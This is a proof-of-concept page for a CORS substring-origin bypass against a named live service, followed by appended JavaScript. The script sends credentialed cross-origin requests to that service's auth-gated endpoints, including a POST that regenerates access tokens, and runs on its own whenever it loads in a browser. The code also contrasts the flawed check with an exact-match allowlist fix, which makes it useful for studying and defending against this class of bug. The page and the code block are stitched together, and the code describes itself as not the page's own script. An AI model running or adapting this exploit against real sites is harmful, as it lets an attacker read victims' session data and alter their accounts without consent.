FIS CodeConnect CORS Substring Bypass PoC

Attacker origin:

This page sends credentialed cross-origin fetches (credentials: "include") from the attacker origin shown above to codeconnect.fisglobal.com. The server's CORS check is a substring match on the Origin header: any origin whose hostname contains the string fisglobal.com is accepted, so an attacker-controlled host that embeds that string is echoed back in Access-Control-Allow-Origin with credentials allowed, which is exactly what a browser requires before it lets attacker JavaScript read the response body. For the auth-gated endpoints that means the victim's session cookies are attached and the responses they unlock are readable cross-origin.

Test: unauth /user/regStatus oracle

running...

Test: auth-gated /idpconfig (sends victim cookies if logged in)

running...

Test: auth-gated /usermanagement

running...

Test: auth-gated /accesstokenregenerate (POST)

running...
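As an added example (not the PoC page's own script), the following reconstructs from the description above the substring Origin check that makes the bypass work, puts an exact-match allowlist check beside it, applies the browser's rule for credentialed reads to both, and models the page's four-request sequence with an injectable fetch so it can be exercised offline. The attacker hostname is hypothetical; the endpoint paths are the ones the page lists, and any query parameters the regStatus oracle may need are not on the page and are not guessed here.

```javascript
// Added example, not the original PoC page's code. The server-side check is
// reconstructed from the page's description; the attacker origin is hypothetical.

const TARGET = "https://codeconnect.fisglobal.com";
const ATTACKER_ORIGIN = "https://fisglobal.com.attacker.example"; // hypothetical

// Vulnerable check (reconstructed): any Origin containing "fisglobal.com" is
// echoed back with credentials enabled. A suffix test (endsWith) is no better:
// "https://notfisglobal.com" would pass it.
function substringCorsHeaders(origin) {
  if (typeof origin === "string" && origin.includes("fisglobal.com")) {
    return {
      "Access-Control-Allow-Origin": origin,
      "Access-Control-Allow-Credentials": "true",
    };
  }
  return {};
}

// Hardened check: exact match of the full origin (scheme, host, port) against
// a fixed allowlist; Vary: Origin keeps shared caches from serving one origin's
// CORS headers to another.
const ALLOWED_ORIGINS = new Set(["https://codeconnect.fisglobal.com"]);

function strictCorsHeaders(origin) {
  if (!ALLOWED_ORIGINS.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// Browser rule for a credentialed request: the body is readable only if
// Access-Control-Allow-Origin equals the requesting origin exactly and
// Access-Control-Allow-Credentials is "true" ("*" is rejected with credentials).
function browserAllowsRead(headers, origin) {
  return headers["Access-Control-Allow-Origin"] === origin &&
    headers["Access-Control-Allow-Credentials"] === "true";
}

// Origins that probe both checks: the legitimate one, two attacker hosts that
// merely contain the string, and an unrelated host.
const PROBE_ORIGINS = [
  "https://codeconnect.fisglobal.com",
  ATTACKER_ORIGIN,
  "https://codeconnect.fisglobal.com.attacker.example",
  "https://evil.example",
];

function evaluateOrigins(origins = PROBE_ORIGINS) {
  return origins.map((o) => ({
    origin: o,
    substringCheckReadable: browserAllowsRead(substringCorsHeaders(o), o),
    strictCheckReadable: browserAllowsRead(strictCorsHeaders(o), o),
  }));
}

// The PoC's test sequence, as listed on the page. credentials: "include"
// attaches the victim's codeconnect cookies, which is what turns the
// reflected origin into a session-data leak on the auth-gated endpoints.
const TESTS = [
  { label: "unauth /user/regStatus oracle", path: "/user/regStatus", method: "GET" },
  { label: "auth-gated /idpconfig", path: "/idpconfig", method: "GET" },
  { label: "auth-gated /usermanagement", path: "/usermanagement", method: "GET" },
  { label: "auth-gated /accesstokenregenerate (POST)", path: "/accesstokenregenerate", method: "POST" },
];

function planRequests() {
  return TESTS.map((t) => ({
    label: t.label,
    url: TARGET + t.path,
    init: { method: t.method, credentials: "include" },
  }));
}

// Runs the sequence with whatever fetch is supplied. In a browser the fetch
// rejects with a TypeError when the CORS check fails, so a caught error means
// the bypass did not work for that endpoint.
async function runPoc(fetchImpl, onResult = () => {}) {
  const results = [];
  for (const req of planRequests()) {
    let outcome;
    try {
      const res = await fetchImpl(req.url, req.init);
      const body = await res.text();
      outcome = { label: req.label, readable: true, status: res.status, body: body.slice(0, 200) };
    } catch (err) {
      outcome = { label: req.label, readable: false, error: String(err) };
    }
    results.push(outcome);
    onResult(outcome);
  }
  return results;
}

// When loaded in a browser on the attacker origin, run the real PoC.
if (typeof window !== "undefined") {
  runPoc((url, init) => fetch(url, init), (r) => console.log(r.label, r));
}
```

The two checks differ only in how the Origin value is compared, which is the whole bug: the fix is an exact match against a closed allowlist, never includes(), endsWith() or a regex without anchors, and the attacker's host in PROBE_ORIGINS is readable under the first check and rejected under the second.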